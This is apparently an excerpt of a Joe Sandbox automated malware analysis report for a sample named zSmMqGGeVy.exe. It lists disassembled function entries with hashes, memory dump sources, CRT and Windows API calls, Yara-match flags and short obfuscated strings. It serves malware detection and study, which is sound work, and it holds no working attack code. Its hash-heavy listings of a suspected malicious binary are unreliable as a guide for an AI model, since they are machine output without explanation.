                                                  • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                  • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                  • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                  • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                  • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                  • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                  • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                  • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                  • Instruction ID: e4c6bf85c97690b13e37909381149b42a89d6b760b23e3eac4b4a46238eac9b9
                                                  • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                  • Instruction Fuzzy Hash: 0F415171E00218AFCB21EF999C819AEBBF9FBCE314B141066F515BB211D770AE41CB94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                  • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9AE86
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00E9AF3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction ID: 788704a3b759b95209b2792d3bf6f85986482f8f8b59a2f0d1916cba5ad8a508
                                                  • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction Fuzzy Hash: 6641A474A002189BCF10DF68C884ADEBBF5AF45318F189165EC14BB352D7359E55CBD2
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                  • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00E9B711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction ID: 815ec471a6f85450fe98432e4f65694779e907cb91ec80a44ac933ea9ecbda34
                                                  • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction Fuzzy Hash: 66419B72900209AFCF25CF98DE81AEEBBB5FF48308F189169F904B7211D3359950CB51
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                  • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                  APIs
                                                  • _free.LIBCMT ref: 100091D6
                                                  • _free.LIBCMT ref: 10009204
                                                    • Part of subcall function 10006928: IsProcessorFeaturePresent.KERNEL32(00000017,10006F58,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006944
                                                    • Part of subcall function 10005879: IsProcessorFeaturePresent.KERNEL32(00000017,1000584B,?,?,00000000,10001F4F,?,00000016,?,10005858,00000000,00000000,00000000,00000000,00000000,10006999), ref: 1000587B
                                                    • Part of subcall function 10005879: GetCurrentProcess.KERNEL32(C0000417), ref: 1000589E
                                                    • Part of subcall function 10005879: TerminateProcess.KERNEL32(00000000), ref: 100058A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
                                                  • String ID: `0
                                                  • API String ID: 1729132349-3674772010
                                                  • Opcode ID: 3a8ca4b1f83dae6a6342a3c26cafa7bfedda3c5115151024341f1082e83735b7
                                                  • Instruction ID: 96f9824940e19e676ffddcbf318cd994e8a5680d720d95f1860c28c085213dd1
                                                  • Opcode Fuzzy Hash: 3a8ca4b1f83dae6a6342a3c26cafa7bfedda3c5115151024341f1082e83735b7
                                                  • Instruction Fuzzy Hash: FC21B079B04203ABFB04CEA4CC45AAA77EAEF846D0F254069F8059718EEB72DA01C750
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 004013BB
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: FEKN$NE]D
                                                  • API String ID: 2296764815-517842756
                                                  • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                  • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                  • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                  • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E91622
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: FEKN$NE]D
                                                  • API String ID: 4132704954-517842756
                                                  • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                  • Instruction ID: b4c38075595d91eb947f55b33b401d60082f5dcf1bd9d2ca75f58d62163b580a
                                                  • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                  • Instruction Fuzzy Hash: 86215A70B00345CBDB20CF28E846BA877A0FF95304F9452A9D8142B663EBB52586C7CE
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 2296764815-3597986494
                                                  • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                  • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                  • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                  • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 0040776E
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 2296764815-3597986494
                                                  • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                  • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                  • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                  • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E979D5
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 4132704954-3597986494
                                                  • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                  • Instruction ID: 4a1f778a3c17813f6b29ea082cffccee8d426e8aacc8e200ea3af0cbf543857b
                                                  • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                  • Instruction Fuzzy Hash: 0F01D670B003088BCB20FFADAD4265D73B4FB04310F9192AEE51967292D7755945CBC9
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97F95
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 4132704954-3597986494
                                                  • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                  • Instruction ID: d656048bb623f40295e0a238cfbbc0fa62e17fbe1c975043e8b40affecc14cb0
                                                  • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                  • Instruction Fuzzy Hash: 0501D670B003058BCB20EF69BD4299D73A5FB44310B941179E52967242D77499458BD9
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407119
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: DCDO$EDO*
                                                  • API String ID: 2296764815-3480089779
                                                  • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                  • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                  • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                  • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407229
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: DCDO$^]E*
                                                  • API String ID: 2296764815-2708296792
                                                  • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                  • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                  • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                  • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97380
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: DCDO$EDO*
                                                  • API String ID: 4132704954-3480089779
                                                  • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                  • Instruction ID: 602f9e14e0a634b91a37a684a28b55f101e6bab71df34c8a01559c3e3f56f1c8
                                                  • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                  • Instruction Fuzzy Hash: 3A0186B0B113089FCB10DF68E98259CB7B0EB05314F905179DA1567391D7346985CB89
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97490
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: DCDO$^]E*
                                                  • API String ID: 4132704954-2708296792
                                                  • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                  • Instruction ID: 56ed54d924e684f797215b3bbb9bc4b87111a337f5aa19cdf21d5a1eefe13d7c
                                                  • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                  • Instruction Fuzzy Hash: BF018170B002089FCB20EFA8E95359CBBF4EB04700F94417AD91967392DB35A9158BD9
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: `0
                                                  • API String ID: 269201875-3674772010
                                                  • Opcode ID: 5078698d2abe3b1fdb1891182b495dbc906b0e89d0e572ab4a00d2e6a8bc271b
                                                  • Instruction ID: fac8eebfbd27b01136f76e2cc515f45fe441570489254ee9cd35050f4ce8a31d
                                                  • Opcode Fuzzy Hash: 5078698d2abe3b1fdb1891182b495dbc906b0e89d0e572ab4a00d2e6a8bc271b
                                                  • Instruction Fuzzy Hash: FDE0E536A0952149F315D739AC0125F25D3EBC56F1B210326F820971E9DFB09B41D2E2